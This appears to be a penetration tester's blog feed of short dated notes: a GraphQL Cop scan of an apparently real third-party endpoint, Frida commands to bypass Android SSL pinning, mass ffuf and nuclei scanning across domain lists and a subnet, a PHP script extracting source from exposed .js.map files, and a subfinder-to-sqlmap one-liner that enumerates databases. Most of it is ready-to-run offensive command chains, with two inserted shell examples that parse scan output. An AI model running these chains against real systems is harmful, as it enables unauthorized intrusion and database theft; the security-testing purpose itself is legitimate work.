Friday, 11 April 2025

GraphQL Cop - Security Audit Utility for GraphQL

GraphQL Cop is a small Python utility for running common security tests against GraphQL APIs. GraphQL Cop is ideal for CI/CD checks of GraphQL endpoints. It is lightweight and covers the interesting GraphQL security issues.


GraphQL Cop lets you reproduce the findings by providing cURL commands for every identified vulnerability.

A writeup on GraphQL - https://blog.koalasec.co/2500-dollars-in-bounties-hacking-graphql


https://github.com/dolevf/graphql-cop


└─# python3 graphql-cop.py -t https://sdb.ua/?q=getnciesList

[HIGH] Alias Overloading - Alias Overloading with 100+ aliases is allowed (Denial of Service - /graphiql)

[HIGH] Alias Overloading - Alias Overloading with 100+ aliases is allowed (Denial of Service - /playground)

[HIGH] Alias Overloading - Alias Overloading with 100+ aliases is allowed (Denial of Service - /console)

[HIGH] Alias Overloading - Alias Overloading with 100+ aliases is allowed (Denial of Service - /graphql)

[HIGH] Directive Overloading - Multiple duplicated directives allowed in a query (Denial of Service - /graphiql)

[HIGH] Directive Overloading - Multiple duplicated directives allowed in a query (Denial of Service - /playground)

[HIGH] Directive Overloading - Multiple duplicated directives allowed in a query (Denial of Service - /console)

[HIGH] Directive Overloading - Multiple duplicated directives allowed in a query (Denial of Service - /graphql)

[HIGH] Field Duplication - Queries are allowed with 500 of the same repeated field (Denial of Service - /graphiql)

[HIGH] Field Duplication - Queries are allowed with 500 of the same repeated field (Denial of Service - /playground)

[HIGH] Field Duplication - Queries are allowed with 500 of the same repeated field (Denial of Service - /console)

[HIGH] Field Duplication - Queries are allowed with 500 of the same repeated field (Denial of Service - /graphql)

[LOW] Field Suggestions - Field Suggestions are Enabled (Information Leakage - /graphiql)

[LOW] Field Suggestions - Field Suggestions are Enabled (Information Leakage - /playground)

[LOW] Field Suggestions - Field Suggestions are Enabled (Information Leakage - /console)

[LOW] Field Suggestions - Field Suggestions are Enabled (Information Leakage - /graphql)

[HIGH] Introspection - Introspection Query Enabled (Information Leakage - /graphiql)

[HIGH] Introspection - Introspection Query Enabled (Information Leakage - /playground)

[HIGH] Introspection - Introspection Query Enabled (Information Leakage - /console)

[HIGH] Introspection - Introspection Query Enabled (Information Leakage - /graphql)
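An added example, not part of this post or of GraphQL Cop itself: a POSIX shell snippet that turns GraphQL Cop's text output (the format shown above) into a deduplicated summary, one line per distinct finding with all affected endpoints, and a CI/CD gate that fails the pipeline when any HIGH finding is present. The sample lines are constructed in the same format, not real scan output.

```shell
#!/bin/sh
# Constructed sample in GraphQL Cop's text output format (not real scan output).
SAMPLE='[HIGH] Alias Overloading - Alias Overloading with 100+ aliases is allowed (Denial of Service - /graphiql)
[HIGH] Alias Overloading - Alias Overloading with 100+ aliases is allowed (Denial of Service - /graphql)
[LOW] Field Suggestions - Field Suggestions are Enabled (Information Leakage - /graphql)
[HIGH] Introspection - Introspection Query Enabled (Information Leakage - /graphql)'

# gql_cop_summary: read GraphQL Cop text output on stdin and print one line per
# distinct finding: SEVERITY<TAB>CHECK<TAB>IMPACT<TAB>comma-separated endpoints.
gql_cop_summary() {
  awk '
    match($0, /^\[[A-Z]+\]/) {
      sev = substr($0, 2, RLENGTH - 2)                 # text inside [ ]
      split(substr($0, RLENGTH + 2), parts, " - ")     # "Check - description ..."
      check = parts[1]
      impact = ""; endpoint = ""
      # impact and endpoint sit in the trailing "(Impact - /path)"
      if (match($0, /\([^()]* - \/[^()]*\)$/)) {
        split(substr($0, RSTART + 1, RLENGTH - 2), t, " - ")
        impact = t[1]; endpoint = t[2]
      }
      key = sev "\t" check "\t" impact
      eps[key] = (key in eps) ? eps[key] "," endpoint : endpoint
    }
    END { for (k in eps) print k "\t" eps[k] }' | sort
}

# gql_cop_gate: exit 0 when no HIGH finding is present, 1 otherwise.
# CI usage (assumed pipeline step): python3 graphql-cop.py -t "$TARGET" | gql_cop_gate
gql_cop_gate() {
  high=$(gql_cop_summary | grep -c '^HIGH' || true)
  [ "$high" -eq 0 ]
}

printf '%s\n' "$SAMPLE" | gql_cop_summary
printf '%s\n' "$SAMPLE" | gql_cop_gate || echo "gate: HIGH findings present, failing the pipeline"
```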

Monday, 16 December 2024

apk speed environment for pentest


emulator -avd Pixel_5_API_30 

 adb root; adb connect localhost:6000; sleep 1; adb push frida-server /data/local/tmp/; adb shell "chmod 755 /data/local/tmp/frida-server"; adb shell "/data/local/tmp/frida-server &" 

next


frida-ps -U |grep APK



  frida -U -n APK --codeshare pcipolloni/universal-android-ssl-pinning-bypass-with-frida 

or

  frida -U -n APK --codeshare akabe1/frida-multiple-unpinning


Monday, 21 October 2024

run ffuf on all domains from a file

httpx -list mexico | xargs -I {} sh -c 'clean_url=$(echo {} | sed -e "s|https://|1|g" -e "s|http://|2|g"); ffuf -u {}/FUZZ -w raft-large-words.txt -ac -c -e .txt,.php,.bak,.rar,.sql,.zip,.php_,.old,._old,._php --recursion --recursion-depth 2 >> ffuf-mexico$clean_url'

Thursday, 3 October 2024

*.js.map files

In web applications, remember to check whether the developer forgot to remove the .js.map files.


A quick PHP script, and usually a good result


<?php
/**
 * Created by PhpStorm.
 * User: edwinsturt
 * Date: 2020-06-24
 * Time: 00:45
 */

// Source map to unpack; another path can be passed as the first argument: php skrypt.php app.js.map
$file = $argv[1] ?? 'main.ff0058ad.js.map';

if (file_exists($file)) {
    $json = json_decode(file_get_contents($file));

    if ($json === null || !isset($json->sources, $json->sourcesContent)) {
        die("Not a valid source map (missing sources/sourcesContent)\n");
    }

    $files = [];

    foreach ($json->sources as $index => $source) {
        // Skip entries whose content is not embedded in the map
        if (!isset($json->sourcesContent[$index])) {
            continue;
        }
        // The map comes from the target: never let its paths escape the working directory
        if ($source[0] === '/' || strpos($source, '..') !== false) {
            continue;
        }
        $dir = dirname($source);
        if (!is_dir($dir)) {
            mkdir($dir, 0755, true);
        }
        $out = $dir . "/" . basename($source);
        file_put_contents($out, $json->sourcesContent[$index]);
        $files[] = $out;
    }
    echo "<pre>All source files have been extracted from the map file ";
    print_r($files);
}
?>


php skrypt.php and welcome to the env :)



Monday, 16 September 2024

Run nuclei for all ports

Running nuclei on all ports

naabu -silent -host 192.168.1.0/24 | while read -r line; do nuclei -u "${line}" >> siec_wew ; done


nmap -iL mexico -p- --open -oG - | awk '/Up$/{print $2}' | xargs -I {} nuclei -target {} -o mexico_all-nuclei
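An added example, not from the post: a shell function that turns nmap's greppable (-oG) output into host:port targets for every open TCP port, so nuclei gets each discovered service rather than only the host address. The -oG lines are a constructed sample, not a real scan.

```shell
#!/bin/sh
# Constructed sample of nmap -oG output (not a real scan).
SAMPLE_OG='# Nmap 7.94 scan initiated (constructed sample)
Host: 192.168.1.10 ()	Status: Up
Host: 192.168.1.10 ()	Ports: 22/open/tcp//ssh///, 8080/open/tcp//http-proxy///	Ignored State: closed (65533)
Host: 192.168.1.11 ()	Status: Up
Host: 192.168.1.11 ()	Ports: 443/open/tcp//https///, 3306/filtered/tcp//mysql///	Ignored State: closed (65533)
# Nmap done'

# nmap_open_targets: read -oG output on stdin, print host:port for every open TCP port.
nmap_open_targets() {
  awk '/^Host:/ && /Ports:/ {
    host = $2                                   # the IP is the second field of a Host: line
    sub(/.*Ports: /, ""); sub(/[[:space:]]*Ignored State:.*/, "")
    n = split($0, entries, ", ")
    for (i = 1; i <= n; i++) {
      split(entries[i], f, "/")                 # port/state/proto/owner/service/rpc/version
      if (f[2] == "open" && f[3] == "tcp") print host ":" f[1]
    }
  }'
}

# Pipeline as in the post, with the ports preserved:
#   nmap -iL mexico -p- --open -oG - | nmap_open_targets > targets.txt
#   nuclei -l targets.txt -o mexico_all-nuclei
printf '%s\n' "$SAMPLE_OG" | nmap_open_targets
```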

Tuesday, 11 June 2024

SQLi oneliner automation

 subfinder -d testphp.vulnweb.com -all -silent | gau | urldedupe | gf sqli >sql.txt; sqlmap -m sql.txt --batch --dbs --risk 2 --level 5 --random-agent | tee -a sqli.txt





go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest

go install github.com/lc/gau/v2/cmd/gau@latest

git clone https://github.com/ameenmaali/urldedupe.git;cd urldedupe;cmake CMakeLists.txt;make;cp urldedupe /usr/bin/

go install github.com/tomnomnom/gf@latest;cp ~/go/bin/gf /usr/bin/;mkdir ~/.gf;git clone https://github.com/Sherlock297/gf_patterns.git;cd gf_patterns/;cp *.json ~/.gf;gf -list